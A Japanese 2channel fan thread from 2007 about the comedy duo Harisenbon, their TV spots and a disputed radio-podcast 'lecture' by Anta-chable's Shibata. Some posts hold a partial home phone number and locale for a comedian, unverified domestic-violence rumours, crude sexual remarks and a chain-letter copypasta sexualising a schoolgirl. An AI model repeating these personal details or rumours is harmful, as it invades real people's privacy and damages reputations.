205 :名無しさん@板分割議論中:2007/02/06(火) 13:11:13
>>204
本人たちは大変だったと思うけど、「すえぜん」面白かったよね。

コント番組やって欲しいなぁ・・・。
できればアンガールズと一緒にグダグダやって欲しい。


206 :名無しさん@板分割議論中:2007/02/06(火) 13:46:16
アンガールズとはるかがグダグダしてる所を
春菜に思いっきりツッコんでほしいw

207 :名無しさん@板分割議論中:2007/02/06(火) 15:17:34
>>206
それいいね〜
共演を心待ちにしてるのになかなか共演しないんだよね…

208 :名無しさん@板分割議論中:2007/02/06(火) 16:22:33
春菜「そこの病人3人!グダグダしない!」

田中「わー春菜姉さん怖い…」
はるか「すいません…あれでも23才なんです」
山根「えー!」

209 :名無しさん@板分割議論中:2007/02/06(火) 21:56:05
来週のロンハー格付け出るな。
着物姿のはるかが見れるな。結構イイぜ。

210 :名無しさん@板分割議論中:2007/02/06(火) 22:10:22
今日、大学に行って、めっちゃ春菜に似た院生と会った!!!
似すぎてマジびっくり。その人が凄い良い人だったこともあってか、
ハリセンボンに対して凄い好感度が上がったw 

私事でスマソ。。この感動を誰かに伝えたかったんだ・・・。    逝ってきます

211 :名無しさん@板分割議論中:2007/02/06(火) 22:22:58
アンガとハリセンヲタの私が通りますよ。

今日アンガライブでD関に出るための大喜利やってた

山根「去年は箕輪に負けた。あいつ面白いんだよなぁ。
ビジュアル同じ感じなのに」
と言ってた。

212 :名無しさん@板分割議論中:2007/02/07(水) 01:34:35
アンタッチャブルのラジオかー
柴田はハリセンボンの事嫌いと思ってたよ

213 :名無しさん@板分割議論中:2007/02/07(水) 10:09:21
>>211
アンガまたD関出る気なんだね
アンガ好きだけど、大喜利には向かないような気がする

はるかの大喜利は本当に面白いもんね
年末のルミネ大喜利行ったけど、さすがって感じだった

214 :名無しさん@板分割議論中:2007/02/07(水) 12:47:10
>>213
確かに。
でも毎月ライブでやるらしいから去年よりはうまくなるかも。

215 :名無しさん@板分割議論中:2007/02/07(水) 12:59:53
>>214
そうなんだ〜。今年は頑張って欲しいね。
またはるかと山根が対戦になればいいのにね。
ハリセンもアンガも大好き!

216 :名無しさん@板分割議論中:2007/02/08(木) 01:55:36
春菜チャンの髪が長かった頃の写真見たらめちゃくちゃ変だった!!今のショートが一番似合ってて可愛い☆

217 :名無しさん@板分割議論中:2007/02/08(木) 02:13:39
眼鏡のほう


鼻整形しましたね


明らかにいびつな筋が通ってる

218 :名無しさん@板分割議論中:2007/02/08(木) 12:58:30
てか整形したんだったら鼻より口元するでしょ

219 :名無しさん@板分割議論中:2007/02/08(木) 14:03:17
↑あ、ごめん
勘違いしたw

220 :名無しさん@板分割議論中:2007/02/09(金) 01:47:24
Dカップ巨乳を豪語しとるぞ

221 :名無しさん@板分割議論中:2007/02/09(金) 10:04:57
いまどきDカップで豪語って。
大きさじゃなくて美乳を売りにしてるのか?

222 :名無しさん@板分割議論中:2007/02/09(金) 10:16:32
ハリセンボンの乳について
真面目に語り合うお前らが好きだ


223 :通行人さん@無名タレント:2007/02/09(金) 13:42:05
http://www.youtube.com/watch?v=4ymUCisbdUo&mode=related&search=
ハリセンボン、35位と36位の人みたいになればいいのに。


224 :名無しさん@板分割議論中:2007/02/09(金) 16:07:28
アンタッチャブルのラジオつまんなかったんだけど
あれはハリセンボンのせいなのかな?


225 :名無しさん :2007/02/09(金) 16:13:14
ttp://mycasty.jp/public/kamekichi/images/574085.jpg

ちょwwwwwwwww怖スwwwwwwwwwwwwww。

226 :名無しさん@板分割議論中:2007/02/09(金) 18:35:12
アンタッチャブルのラジオのポットキャストで柴田がハリセンボンに説教してる

227 :名無しさん@板分割議論中:2007/02/09(金) 18:41:02
ネットで日記つけてるんだが、友人に(文面から漂う)雰囲気が箕輪って言われた。
誉められてるのか引かれてるのかわかんないが、ハリセンボン結構すきだから礼言っといたw

228 :名無しさん@板分割議論中:2007/02/09(金) 19:43:55
>226
kwsk
本気か冗談かで意味合い変わってくる

229 :名無しさん@板分割議論中:2007/02/09(金) 20:24:08
ハリセンボンCDデビューすんのかよwww
Mステとか出て欲しいw

230 :名無しさん@板分割議論中:2007/02/09(金) 21:04:11
二人とも性格が良さそうで
なおかつ幸の薄い顔だから
なんか応援したくなるよな。
同じブスを売りにしたクワバタオバラは二人とも性格悪そう。

231 :名無しさん@板分割議論中:2007/02/09(金) 23:01:05
>>228
おそらくマジ説教
ハリセンの2人泣いてたし
柴田…
詳しくは聞いてみて

232 :名無しさん@板分割議論中:2007/02/09(金) 23:27:07
それはどこから聴けるんでしょ?

233 :名無しさん@板分割議論中:2007/02/09(金) 23:33:08
>>231
聞いたけどあれネタでしょw

234 :228:2007/02/09(金) 23:43:39
>231
うほ、ありがとう。
TBSのサイトで聴けるみたいだね
今混んでるっぽいから明日聴いてみる

235 :名無しさん@板分割議論中:2007/02/09(金) 23:48:44
聞いたけど柴田マジ最低

236 :名無しさん@板分割議論中:2007/02/09(金) 23:54:13
>>231
聞いたけどネタでしょ、あれ。
なんか久しぶりに2ちゃんルール「嘘を(ry」を思い出した。
自分のところではラジオやってないんだけど、どこかで落とせるかな?

237 :名無しさん@板分割議論中:2007/02/10(土) 00:24:18
>>229
MステはVTRはいいけど生放送出ると芸人はもれなく変な空気になるからなぁ

うたばんなら出そうw

238 :名無しさん@板分割議論中:2007/02/10(土) 00:37:42
今日のMステかわいかった〜
次はゲストで出て欲しい

239 :名無しさん@板分割議論中:2007/02/10(土) 01:27:28
ポッドキャスト聞いたがもうアンタとは絡んでほしくない
偉そうにしすぎ

240 :名無しさん@板分割議論中:2007/02/10(土) 03:20:45
とりあえず柴田、お前がダメ出しすんな。と思いました。

241 :名無しさん@板分割議論中:2007/02/10(土) 03:35:08
柴田が説教か…
なんかムカツクな

242 :名無しさん@板分割議論中:2007/02/10(土) 03:42:26
つまんないのにね、柴田。

243 :名無しさん@板分割議論中:2007/02/10(土) 03:44:09
中絶野郎に言われたかない

244 :名無しさん@板分割議論中:2007/02/10(土) 03:49:02
ネタじゃん
何でマジになってんの?

245 :名無しさん@板分割議論中:2007/02/10(土) 03:54:04
中絶は関係ないけど柴田に電波で説教されるゆえんはない

246 :名無しさん@板分割議論中:2007/02/10(土) 03:55:29
ネタだろうけど面白くないし…
もうなに柴田
考えるだけで腹立つわー
ハリセンボンさっさと追い抜いてくれ

247 :名無しさん@板分割議論中:2007/02/10(土) 03:59:26
え、聞けてない
何があったの??

248 :名無しさん@板分割議論中:2007/02/10(土) 04:01:08
このスレって、ブスな女しか居なさそうだな。

249 :名無しさん@板分割議論中:2007/02/10(土) 04:02:20
ラジオからの続きのネタじゃんね
ラジオ聞いてないと面白くないのかな?

250 :名無しさん@板分割議論中:2007/02/10(土) 04:02:38
>>247
ポッドキャストで本編の反省と称して説教
柴田が延々ハリセンボンにダメ出ししてて2人は涙
ネタだろうけど腹立った
何様のつもりだよ

251 :名無しさん@板分割議論中:2007/02/10(土) 04:04:03
>>247
アンタのラジオに呼んでもらって
その後の反省会をwebラジオでやってる

252 :名無しさん@板分割議論中:2007/02/10(土) 04:04:48
>>249
まず本編もイマイチだったからね。
それをハリセンボンの責任にしちゃってる感じ。
いつもの彼らがどんくらい面白いのか知らないけどさ

253 :名無しさん@板分割議論中:2007/02/10(土) 04:06:10
涙ってw
別に泣いてないだろ。
二人とも笑ってたじゃんw笑い声がしてたよ。
単なるネタには過剰反応しすぎだよ。

254 :名無しさん@板分割議論中:2007/02/10(土) 04:06:34
なんつーかもっと面白い芸人に説教されるならともかく、柴田だからねー。
笑えない。

255 :名無しさん@板分割議論中:2007/02/10(土) 04:08:15
>>253
思いっきし泣いてましたが

256 :名無しさん@板分割議論中:2007/02/10(土) 04:10:26
>>254
同意
お前自身つまんねえだろって突っ込みたくなる
山崎に説教されるならまだ分かるが
山崎はそんなキャラじゃないか

257 :名無しさん@板分割議論中:2007/02/10(土) 04:11:45
>>255
最後までふたりの笑い声してたじゃんw

258 :名無しさん@板分割議論中:2007/02/10(土) 04:12:41
ハリセンボン頑張れ!
そんな奴ら無視して自分達が思うようにやればいいんだよ!

259 :名無しさん@板分割議論中:2007/02/10(土) 04:13:59
>>257
そりゃ泣いてたのを必死に隠すためだろ
お前もう一回聞けば

260 :名無しさん@板分割議論中:2007/02/10(土) 04:15:59
>>259
ここで泣いてるってレス見てから聞き直したよ
でも何回聞いてもネタにしか聞こえなかったよ
お前はバラエティー理解できてないようだからNHKだけ見てれば?w

261 :名無しさん@板分割議論中:2007/02/10(土) 04:16:10
30分同じトーンで延々説教ってのに引いた。粘着すぎ。

262 :名無しさん@板分割議論中:2007/02/10(土) 04:18:49
>>260
ネタだろうけどって何回も書いてますけど…
ただ泣いたのは事実だろ


263 :名無しさん@板分割議論中:2007/02/10(土) 04:21:27
>>262
どう聞いても泣いてるようには感じなかったけど
お前の言うように本当に泣いてたとしたらネタで泣いたってこと?
だったら良くね?言い分が矛盾してますがなw

264 :名無しさん@板分割議論中:2007/02/10(土) 04:21:32
どうしてもハリセンボンのせいにしたかったんだろうな
まあでもハリセンボンもイマイチ乗り切れてなかったから、
しょうがないんじゃない。

265 :名無しさん@板分割議論中:2007/02/10(土) 04:22:35
ネタかー笑えないネタだー。柴田はまず己の芸を研かなきゃねー。

266 :名無しさん@板分割議論中:2007/02/10(土) 04:24:37
単なる説教じゃなく、所々笑いも交えてなかった?
普通にミニコント的なものとして聞いたけど

267 :名無しさん@板分割議論中:2007/02/10(土) 04:27:38
半分コントで半分本気でしょ
ネタだったら泣いたこと触れるだろ
微妙だけど柴田はマジ説教をネタっぽくしようとしたんじゃないの


268 :名無しさん@板分割議論中:2007/02/10(土) 04:28:58
>>266
私もミニコントだと思った。ただアンタッチャブルは2人のイジリ方をわかってないと思ったな〜。吉本の先輩方のハリセンボンのイジリを見習ってほしいわ

269 :名無しさん@板分割議論中:2007/02/10(土) 04:29:01
>>266
そりゃそうだろ
ネットとはいえラジオだから

270 :名無しさん@板分割議論中:2007/02/10(土) 04:31:24
ハリセンボンも柴田も力不足ってことだよ。
ただ二度と柴田と絡んでほしくない。

271 :名無しさん@板分割議論中:2007/02/10(土) 05:58:09
ラジオ本編では、柴田が進行しながらハリを持ち上げて褒めてて山崎がダメ出しをしてたけどポッドではその立場を逆にしてやってる。面白いかどうかは別れるかもだがw

272 :名無しさん@板分割議論中:2007/02/10(土) 08:11:16
過保護すぎない?


273 :名無しさん@板分割議論中:2007/02/10(土) 10:42:10
お前ら盲目すぎ。
柴田に説教されてもおかしくない。

274 :名無しさん@板分割議論中:2007/02/10(土) 10:57:23
アンタスレから出張してくんな糞ウゼー

275 :名無しさん@板分割議論中:2007/02/10(土) 11:33:04
まあまあ。落ち目芸人とそのヲタは放っておけばよし。
いつか今回のポッドキャストがネタになるよう頑張れハリセン。

276 :名無しさん@板分割議論中:2007/02/10(土) 11:39:23
>>268
同意。
∞とか見てると、アンタッチャブルより全然売れてなくて芸歴下でも
もっとうまくいじってる人は吉本の先輩にたくさんいるよね
やっぱり劇場とかで接点が多いからかな

まあ自分は本編もポッドキャストもそれなりに面白かったよ

277 :名無しさん@板分割議論中:2007/02/10(土) 11:49:18
アンタッチャブルはイジるの下手すぎでハリセンの良さを引き出す力がないから2度と絡んでほしくないわ

278 :名無しさん@板分割議論中:2007/02/10(土) 12:41:46
ハリセンボンが、この先3年以上生き残ってから言え。

279 :名無しさん@板分割議論中:2007/02/10(土) 13:00:44
アンタより有望

280 :名無しさん@板分割議論中:2007/02/10(土) 13:10:29
>>237
イイ!
うたばんとかでたら面白そうww

281 :名無しさん@板分割議論中:2007/02/10(土) 13:20:57
次課長河本がイロモネアで「はるか壁画」
って言ってたの見ていい人だと思った。
柴田みたいな三流芸人に先輩風吹かされたくないね

282 :名無しさん@板分割議論中:2007/02/10(土) 13:46:35
アンタ柴田はDV男の超典型タイプ。
見てるほうがハラハラしてしまう。
大人しく家で療養してほしい。

283 :名無しさん@板分割議論中:2007/02/10(土) 14:26:18
手を繋ごう♪
輪になって踊ろう♪

284 :名無しさん@板分割議論中:2007/02/10(土) 14:29:13
>>281
次課長ヲタ乙!
ハリセンヲタのフリしてもバレバレw
だから2ちゃんから追われるんだよww
避難所カエレwww

285 :名無しさん@板分割議論中:2007/02/10(土) 15:09:41
アンタッチャブルのラジオ聞いたけど、最高のコントじゃんw笑いまくった。3回リピートしたよ。
特に近藤は腕上げたね。「ごめんなさい」の間はベストだった、アレが0.5秒前後にずれてたら駄目だね。
ハルカの「おかわり」は、ボケ方が天才過ぎて一周しちゃってるしw

ブス弄りだけじゃなく、こういうやり取りを生でやれるようになったか〜と感慨深い。

と、こういう見方をする人もいるんですよ。と書いておこう。
意外と芸人さんもみてるからね。

286 :名無しさん@板分割議論中:2007/02/10(土) 15:21:39
>>281
河本本人乙

287 :名無しさん@板分割議論中:2007/02/10(土) 16:02:57
バラエティだと正直柴田より笑い取ってるんだけどね。
いろんな先輩いるから仕方ない。

288 :名無しさん@板分割議論中:2007/02/10(土) 17:05:21
はっきり言うけど自分チャブオタです。
確かにハリセンボンに申し訳なかったなと思う。あれはないわ。
二人とも立ち位置決めかねて困ってる感じが伝わってきた。
完全にチャブの力量不足。
ハリセンボンは売れっ子だから、落ち目芸人のラジオのことなんて忘れちゃって下さいw

289 :名無しさん@板分割議論中:2007/02/10(土) 17:09:36
 ↑
こいつチャブヲタじゃねーな

290 :名無しさん@板分割議論中:2007/02/10(土) 18:36:28
アンタも長い間下っ端でこき使われててようやくある程度の地位についたわけだから
ちょうど偉ぶりたい時期なんだろ。
ハリセンボンは結成して数年だし年齢差やキャラを考えるとちょうどいじりやすいタイプだからな。

291 :名無しさん@板分割議論中:2007/02/10(土) 18:59:12
勢いのある男性後輩芸人には説教できないくせに。
女の子泣かして自己満足する柴田はDV予備軍。

292 :名無しさん@板分割議論中:2007/02/10(土) 19:19:56
春菜って時東ぁみに似ているね。

293 :名無しさん@板分割議論中:2007/02/10(土) 19:30:19
吉本の時東ぁみだからね♪

294 :名無しさん@板分割議論中:2007/02/10(土) 19:38:20
社交ダンス見たいなぁ

295 :名無しさん@板分割議論中:2007/02/11(日) 11:28:38
離婚届突き付けられてストレス溜まってたから、
その発散にハリセンボンに八つ当りしたんじゃないか
まじでDVだな。

296 :名無しさん@板分割議論中:2007/02/11(日) 15:16:15
ハリセンボン似な自称アイドル
http://yaplog.jp/yunahp/archive/191

297 :名無しさん@板分割議論中:2007/02/11(日) 22:52:42
はるかって岡田会だったんだな

298 :名無しさん@板分割議論中:2007/02/11(日) 23:43:58
あたしも始めて知った。女の子は、はるかちゃんひとりだけなのかな?

299 :名無しさん@板分割議論中:2007/02/11(日) 23:58:08
マキパーつよしのブログに写真が

300 :名無しさん@板分割議論中:2007/02/12(月) 00:39:36
ますおかもハリセンも大好き

301 :名無しさん@板分割議論中:2007/02/13(火) 00:39:40
嵐の宿題君のハリセンボン可愛かった〜

302 :名無しさん@板分割議論中:2007/02/13(火) 00:41:42
>>291
予備軍っていうか普通にDV男で有名だろ

303 :名無しさん@板分割議論中:2007/02/13(火) 00:42:06
有名なの?
初めて聞いた。

304 :名無しさん@板分割議論中:2007/02/13(火) 00:43:44
2ちゃんでの噂w

305 :名無しさん@板分割議論中:2007/02/13(火) 00:47:42
岡田会って他に誰がいるの?

306 :名無しさん@板分割議論中:2007/02/13(火) 02:15:30
>>305
主に、次課長井上・タカトシトシ・小力・レギュラー松本だったかな?たしか

307 :名無しさん@板分割議論中:2007/02/13(火) 03:08:47
箕輪ってエビの声に超に照る

ぷよぷよのCM箕輪かとオモタ

308 :名無しさん@板分割議論中:2007/02/13(火) 12:57:12
海老蔵よりはるかのほうがカワイイ

309 :名無しさん@板分割議論中:2007/02/13(火) 12:59:04
知ってる

310 :名無しさん@板分割議論中:2007/02/13(火) 17:49:51
おまえらぁぁ
今日のロンハー見ろよ!

311 :名無しさん@板分割議論中:2007/02/13(火) 18:39:11
>>301
パスタをわんこそば風に食べる?付近から気づいて見始めたんですが
その前はどんな内容だったか、見た人がいたら教えてもらえるとうれしいな
個人的にははるかの「ねえ、私のこと見えてる?」のボケがおもしろかったです

312 :名無しさん@板分割議論中:2007/02/13(火) 21:40:36
箕輪は矯正すれば絶対可愛い
何でしないの

313 :名無しさん@板分割議論中:2007/02/13(火) 21:46:18
近藤さん最高www
おもしろいなぁ

314 :名無しさん@板分割議論中:2007/02/13(火) 21:49:34
誰がペだよ!は名言

315 :名無しさん@板分割議論中:2007/02/13(火) 21:53:35
近藤さんの機敏さは神

316 :名無しさん@板分割議論中:2007/02/13(火) 22:15:43
春菜今日もおもしろかったよ春菜
ペじゃないよ春菜

317 :名無しさん@板分割議論中:2007/02/13(火) 22:48:03
inハワイかよ!に笑った

318 :名無しさん@板分割議論中:2007/02/13(火) 23:35:51
今一番面白い。他はみてられない。

319 :名無しさん:2007/02/13(火) 23:42:55
近藤ロンハーマジウケたwとっさとはいえあの返しは凄い!

320 :名無しさん@板分割議論中:2007/02/14(水) 00:13:33
>>314
ヨン様のこと?

321 :名無しさん@板分割議論中:2007/02/14(水) 01:13:35
「誰がペだよ!」
とかホント反応早いよな
ロンハー面白かったよ
女芸人=つまらんという俺の勝手な図式が唯一成立しなかった
ヘタな男コンビより格段におもしろいぞハリセンボン

322 :名無しさん@板分割議論中:2007/02/14(水) 01:21:16
はるかの大喜利は名人芸

323 :名無しさん@板分割議論中:2007/02/14(水) 02:25:48
>>320
そう

春菜がペ様に似てるってw


324 :名無しさん@板分割議論中:2007/02/14(水) 12:40:49
ペじゃねえよ!

325 :名無しさん@板分割議論中:2007/02/14(水) 12:46:39
リンカーンの次週予告、面白そうだった。
楽しみ。

326 :名無しさん@板分割議論中:2007/02/14(水) 14:03:41
ハリセン大好きだよ〜
でもきのうのロンハー録画できてなかったorz

327 :名無しさん@板分割議論中:2007/02/14(水) 19:10:04
昨日の春菜面白かったね。オウム返しは、春菜でしか笑えない。
時東ぁみに似ていていい。
何気に着物も似合っている

328 :名無しさん@板分割議論中:2007/02/14(水) 20:47:58
はねとびで大活躍
ふたりとも可愛かった

329 :名無しさん@板分割議論中:2007/02/14(水) 21:41:13
昨日ロンブーで初めてこいつらのこと知った
今日のハネトビは不覚にも骸骨に勃起してしまった
骸骨のほうは全然可愛いと思ったんだが
写真見たら、やっぱりやべーなこりゃ
テレビと全然違うじゃねぇか
もう何を信じたらいいのか一瞬分からなくなったわ

デブのほうは論外だけどな
なんか鼻が作り物みたいだし
人間かどうかさえ疑わしい

330 :名無しさん@板分割議論中:2007/02/14(水) 21:58:00
あれは面白い生き物です
ただし見続けると可愛くなってきますので注意してください

331 :名無しさん@板分割議論中:2007/02/14(水) 22:36:52
誰がペだよ! ペじゃねえよ! 角野卓造じゃねえよ! 時東ぁみだよ!

332 :名無しさん@板分割議論中:2007/02/14(水) 23:44:29
はねトびで何やったか誰か教えてくれ
面白かったみたいで見逃して鬱

333 :名無しさん@板分割議論中:2007/02/14(水) 23:48:36
西野のメーク係て言って唇触ったりキスしたり、衣裳係て言って服脱がせて乳首触ったりしてた。ハルカは自分の胸触らせてた。

334 :名無しさん@板分割議論中:2007/02/15(木) 00:50:53
自ら西野に胸を揉ませた上でのハルカのコメント→
1回目
「ゴツゴツしてる・・・」はイマイチやったけど

2回目
「技有りっ・・・」は面白かった

335 :名無しさん@板分割議論中:2007/02/15(木) 01:27:28
近藤の電話番号(自宅)ゲットしました

336 :名無しさん@板分割議論中:2007/02/15(木) 01:35:05
>>335 泣かすなよ!

337 :名無しさん@板分割議論中:2007/02/15(木) 02:55:10
はるか≒石田ゆりこ

338 :名無しさん@板分割議論中:2007/02/15(木) 02:57:39
お前ら正直ハリセンボンで勃起する?俺は無理。

339 :名無しさん@板分割議論中 :2007/02/15(木) 03:01:04
勃起云々じゃないだろう

340 :名無しさん@板分割議論中:2007/02/15(木) 03:02:21
>>336
マジレスです。釣りでもネタでも無く真面目に入手しました。

341 :名無しさん@板分割議論中:2007/02/15(木) 03:07:30
>>340
釣られてやろうwどうやって入手したんだ?

342 :名無しさん@板分割議論中:2007/02/15(木) 03:20:45
>>341
論より証拠0**22247**神奈川の厚木に家あるぞ

343 :名無しさん@板分割議論中:2007/02/15(木) 03:26:39
実家通いなのか?

344 :名無しさん@板分割議論中:2007/02/15(木) 03:28:01
>>343
栄町に居るぞ

345 :名無しさん@板分割議論中:2007/02/15(木) 03:35:11
>>342
輪って何?

346 :名無しさん@板分割議論中:2007/02/15(木) 03:35:27
>>344 ふ〜ん。。。

ちゃんと両親にもご挨拶して真剣交際してやれよw
幸せにな!

347 :名無しさん@板分割議論中:2007/02/15(木) 03:37:37
>>345 おまい、おもしろいw

348 :名無しさん@板分割議論中:2007/02/15(木) 03:46:42
>>342
吉本にメールしといた。
IP調べられて近いうちケーサツくると思うけど頑張ってね。

349 :名無しさん@板分割議論中:2007/02/15(木) 03:51:16
>>345
釣りじゃなければ、もう少し国語のお勉強がんばりましょうね!
輪じゃなくて、論だからw

350 :名無しさん@板分割議論中:2007/02/15(木) 03:56:18
>>342 ご愁傷さまです…

351 :名無しさん@板分割議論中:2007/02/15(木) 03:58:33
都内だろ
10カラ見てなかったのか?

352 :名無しさん@板分割議論中:2007/02/15(木) 04:22:12
はるな一人暮らしだよ ハニカミでもマンション出てた

353 :名無しさん@板分割議論中:2007/02/15(木) 07:52:56
なんか女芸人のほとんどが女を捨てて必死になってシモネタかまして
ボケ役も突っ込みも押しつけがましい感じが受け付けなかったんだけど
ハリセンボンは女を捨てた痛々しさとかが無い所がいい
むしろ性を感じさせない
二人とも女に見えないしね

354 :名無しさん@板分割議論中:2007/02/15(木) 09:11:50
春菜は実家だよ
ハニカミに映ってたのも実家

355 :名無しさん@板分割議論中:2007/02/15(木) 11:16:05
角野卓造じゃねえよっ!

356 :名無しさん@板分割議論中:2007/02/15(木) 11:44:48
春菜さんのうんこたべたい

357 :名無しさん@板分割議論中:2007/02/15(木) 11:47:49
2人とも無理

358 :名無しさん@板分割議論中:2007/02/15(木) 20:53:23
来週のうたばんにハリセンボン出るね^^

359 :名無しさん@板分割議論中:2007/02/15(木) 21:09:12
箕輪さんは高校時代に彼氏がいたと聞いたことあるけど本当?

360 :名無しさん@板分割議論中:2007/02/15(木) 21:51:02
共学?女子高?このひと、東京出身だっけ。

361 :名無しさん@板分割議論中:2007/02/15(木) 22:29:55
気持ち悪いテレビ出るなクソブス

362 :名無しさん@板分割議論中:2007/02/15(木) 22:35:16
箕輪は意外と可愛い気がする

363 :名無しさん@板分割議論中:2007/02/15(木) 23:25:54
はるかと結婚したい

364 :名無しさん@板分割議論中:2007/02/16(金) 01:29:51
はるかパン食いすぎw
かわええ

365 :名無しさん@板分割議論中:2007/02/16(金) 14:58:05
和服の箕輪はキレイだったお。

近藤は時東ぁみに似てる。

366 :名無しさん@板分割議論中:2007/02/16(金) 18:42:49
あたしいろんな人にハリセンボンのはるかに似てるっていわれるよ!
自分でもテレビ見てて自分がでてるのかと思ったくらいにてる!
けど彼氏もいるし街一人で歩いてると必ずナンパされるよ!

367 :名無しさん@板分割議論中:2007/02/16(金) 18:47:35
箕輪はるかって早稲田だったんだね。すごーい

368 :名無しさん@板分割議論中:2007/02/16(金) 19:11:21
>>364
お好み焼きにご飯みたいなものかな?
小麦粉とりすぎのはるかさん。

369 :名無しさん@板分割議論中:2007/02/16(金) 21:20:53
パン&パンわろた。
写真がwww

370 :名無しさん@板分割議論中:2007/02/16(金) 23:17:00
>>366かならずナンパされる、は言い過ぎっ
in オランダかよっ!

371 :名無しさん@板分割議論中:2007/02/17(土) 01:42:18
新宿タワレコのコムロきどりイベント行ってきた。
2人とも小柄でよく見えんかったw

372 :名無しさん@板分割議論中 :2007/02/19(月) 18:05:25
http://www.youtube.com/watch?v=ASRdF9rH3Q0
http://www.youtube.com/watch?v=l7lE7Ub3zOc
ハリセンボンが出来そうなものまね。


373 :名無しさん@板分割議論中:2007/02/19(月) 18:42:56
明光義塾のCM、やっぱりハリセンだったんだね。
「この声はるかちゃんに似てる」とかオモって聞いてたよ。

374 :名無しさん@板分割議論中:2007/02/19(月) 21:04:36
私には、彼氏がいます。彼とわたしは、デートの時、どちらかの家に行き、だれもいないとき
、部屋で横になって裸でだきあいます。それがだんだんエスカレートしていって、学校の体育倉庫で
服をぬがされ、まだ3年生ですが学年で1番大きいおっぱいを、つかむように触られたり、しゃぶった
りされます。最初は、苦手だったんだけどだんだん気持ちよくなりサイコーです。しかも、わたしは
、学年1美人でもてます。彼も同じで、美男美女でよくみんなにうらやましく、思われます。
: : このカキコ見たあなたは4日後に不幸がおとづれ44日後に死にます。それがイヤならコレをコピ
ペして5ケ所にカキコして下さい。私の友達はこれを信じず4日後に親が死にました。44日後友達は
行方不明・・・・。いまだに手がかりもなく私はこのコピペを5ケ所に貼り付けました。すると7日後
に彼氏ができ10日後に大嫌いな人が事故で入院しました。
: :     信じる信じないは勝ってです



375 :名無しさん:2007/02/19(月) 23:59:33
↑とりあえず通報だな!

376 :名無しさん:2007/02/20(火) 01:50:32
うたばんって何曜日だっけ?

377 :名無しさん:2007/02/20(火) 04:32:16
木曜

378 :名無しさん:2007/02/20(火) 10:30:37
2/16のミルクラジェントルのブログに春菜の写真載ってるよ〜
オトメな感じでかわゆい☆

379 :名無しさん:2007/02/20(火) 12:18:27
不細工なだけで面白くはない。
最近の若手芸人みな同じ。
右からきたものを左へ受け流そう。

380 :名無しさん:2007/02/20(火) 13:14:08
>379
ちょ、ムーディー

381 :名無しさん:2007/02/20(火) 16:01:56
ハリセンボン大発生
http://news22.2ch.net/test/read.cgi/newsplus/1171931598/

382 :名無しさん:2007/02/20(火) 16:18:47
今日「なるとも」にでていた

383 :名無しさん:2007/02/20(火) 16:26:21
おもろいと、思っう

384 :名無しさん:2007/02/20(火) 20:35:53
まぁまぁのスレだね

385 :名無しさん:2007/02/20(火) 20:50:09
物を知らないうざ芸人気取り


386 :名無しさん:2007/02/20(火) 22:56:28
リンカーン面白かったよ。番組のスレでも評判上々。
今まではこいつらイマイチと思ってたけど、今日のはかなり良かった

387 :名無しさん:2007/02/20(火) 23:02:07
リンカーン面白かった。
前半がつまらなかった分余計面白く感じた

388 :名無しさん:2007/02/20(火) 23:06:04
女でブスだから先輩にズバズバ言っても許されるとこがいいな
男の後輩芸人だったら躊躇したり怯えたりして先輩をあんなにバカにできないもん
ハリセンボンだから許されるみたいなところがある。
いいポジション手に入れたな。

はるなは体張ったり前に出るタイプで
はるかはボソっと一言で爆笑をもっていくタイプだし
なかなかいいバランスのコンビだ

389 :近藤love:2007/02/20(火) 23:17:06
あぁ俺近藤に逆レイプされたいよ
今日のリンカーン見たろ?
あんな感じで言葉責めされてさ
もうチンポはビンビンさ

390 :名無しさん:2007/02/20(火) 23:31:49
リンカーンよかったよ
23と26だろ?度胸あるなこいつら

391 :名無しさん:2007/02/20(火) 23:32:12
今日のリンカーンはグッジョブでした
ドーンの方がイマイチ盛り上がってなかった分かなり良かったです

392 :名無しさん:2007/02/21(水) 00:05:15
先輩芸能人の悪口言って毒舌芸人を気取ってるとそのうち波田陽区みたいになっちゃうよ

393 :名無しさん:2007/02/21(水) 00:06:22
リンカーン面白かった〜度胸あるのね
2人とも声がとってもカワイイ

394 :名無しさん:2007/02/21(水) 07:58:36
芸歴3〜4年の後輩が上から目線で物申す。
ウマい企画w
95%は台本だろうけどあとは春菜のアドリブ力が利いてるな

395 :名無しさん:2007/02/21(水) 12:43:50
>>394 手垢が付いてますが…

396 :名無しさん:2007/02/21(水) 17:55:16
近藤って性格の底意地の悪さが顔ににじみ出てるね。

397 :名無しさん:2007/02/21(水) 18:26:09
もうすぐ春菜誕生日だね。
誕生日来てもまだ24なんだ、若いなぁ…

398 :名無しさん:2007/02/21(水) 18:54:36
毒があるけど笑えるのがブラックユーモア。
ただの悪口が誹謗中傷。
どうみても後者でした。本当に

399 :名無しさん:2007/02/21(水) 20:24:33
半年くらい前のロンブー「はい、ズッコケもできます!」以来注目してたが、
昨日のリンカーンで北陽クワバタオハラ森三中は抜いたと確信。
二人ともかわいいし、もっとがんがれ。

400 :名無しさん:2007/02/21(水) 20:58:36
女芸人ってボケが面白くないやつばっかりだったけどはるかは逸材。
言葉のチョイスが絶妙。

130Rっぽい
はるな=ホンコン
はるか=板尾

401 :名無しさん:2007/02/21(水) 21:02:37
うわー
ウイルス警告出た

402 :名無しさん:2007/02/21(水) 21:30:01
確かに北陽、クワバタオハラ、森三中はおもしろくなさずぎだけど
ハリセンボンもなんだかなぁ。

403 :名無しさん:2007/02/21(水) 21:56:52
柳原可奈子スレは絶賛の嵐だぞ
ハリセンボンも負けるな

404 :名無しさん:2007/02/21(水) 22:07:41
あれはただのピザヲタ

405 :名無しさん:2007/02/22(木) 00:10:56
>>400
あ、ちょっと同意。ギャーギャーうるさくないのがいい。
コンビだから、片方が鶴の一声タイプでもバランス取れてる。
一人だったらだいだひかるみたいな感じで、ちょっと苦しい。

406 :名無しさん:2007/02/22(木) 01:53:48
これはヒドイ。お前らリンカーンスレ荒らしすぎ

69 :名無しでいいとも!@放送中は実況板で :2007/02/21(水) 09:39:32 ID:obM9VU600
爆破はつまんなかったけど
ハリセンボンの授業は面白かった
はるかちゃんたまに喋ると笑える

117 :名無しでいいとも!@放送中は実況板で :2007/02/21(水) 13:22:21 ID:6tJBljaX0
ハリセンボンの準レギャラーが確定したな


174 :名無しでいいとも!@放送中は実況板で :2007/02/21(水) 21:13:46 ID:6a7YOoYK0
ハリセンボンは面白いからレギュラーに入れた方がいい
さまぁーずか雨上がりどっちかいらないだろ。
あいつらギャラ高いだけで仕事してない

407 :名無しさん:2007/02/22(木) 07:31:32
先輩へのダメ出しが斬新な企画に思えるって、
ハリセン信者はいつの時代から来たんだよw

408 :名無しさん:2007/02/22(木) 09:02:18
>>399
